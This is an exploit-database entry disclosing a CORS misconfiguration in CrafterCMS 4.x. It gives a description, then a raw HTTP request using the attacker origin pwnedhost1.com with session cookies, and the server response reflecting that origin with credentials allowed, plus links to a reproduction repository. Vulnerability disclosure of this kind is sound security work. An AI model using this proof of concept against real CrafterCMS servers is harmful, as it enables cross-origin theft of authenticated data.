craftercms 4.x.x – CORS

  • 作者: nu11secur1ty
    日期: 2023-04-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51313/
  • ## Exploit Title: craftercms 4.x.x - CORS 
    ## Author: nu11secur1ty
    ## Date: 03.07.2023
    ## Vendor: https://docs.craftercms.org/en/4.0/index.html#
    ## Software: https://github.com/craftercms/craftercms/tags => 4.x.x
    ## Reference: https://portswigger.net/web-security/cors
    
    
    ## Description:
    The application implements an HTML5 cross-origin resource sharing
    (CORS) policy for this request that allows access from any domain.
    The application allowed access from the requested origin
    pwnedhost1.com which domain is on the attacker.
    The application allows two-way interaction from the pwnedhost1.com
    origin. This effectively means that any domain can perform two-way
    interaction by causing the browser to submit the null origin, for
    example by issuing the request from a sandboxed iframe. The attacker
    can use some library of the
    victim and this can be very dangerous!
    
    STATUS: HIGH Vulnerability
    
    [+]Exploit:
    
    [-]REQUEST...
    
    ```GET
    GET /studio/api/1/services/api/1/server/get-available-languages.json HTTP/1.1
    Host: 192.168.100.87:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178
    Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: XSRF-TOKEN=5ce93c90-2b85-4f9a-9646-2a1e655b1d3f;
    JSESSIONID=4730F0ED2120D31A17574CE997325DA8
    Referer: http://192.168.100.87:8080/studio/login
    x-requested-with: XMLHttpRequest
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Origin: http://pwnedhost1.com/
    ```
    [-]RESPONSE:
    
    ```
    HTTP/1.1 200
    Vary: Origin
    Vary: Access-Control-Request-Method
    Vary: Access-Control-Request-Headers
    Access-Control-Allow-Origin: http://pwnedhost1.com/
    Access-Control-Allow-Credentials: true
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: 0
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Type: application/json;charset=UTF-8
    Content-Language: en-US
    Date: Tue, 07 Mar 2023 11:00:19 GMT
    Connection: close
    Content-Length: 124
    
    [{"id":"en","label":"English"},{"id":"es","label":"Espa..ol"},{"id":"kr","label":"........."},{"id":"de","label":"Deutsch"}]
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CrafterCMS/CrafterCMS-4.0.0)
    
    ## Proof and Exploit:
    [href](https://streamable.com/jd1x8j)
    
    ## Time spend:
    01:00:00
    
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>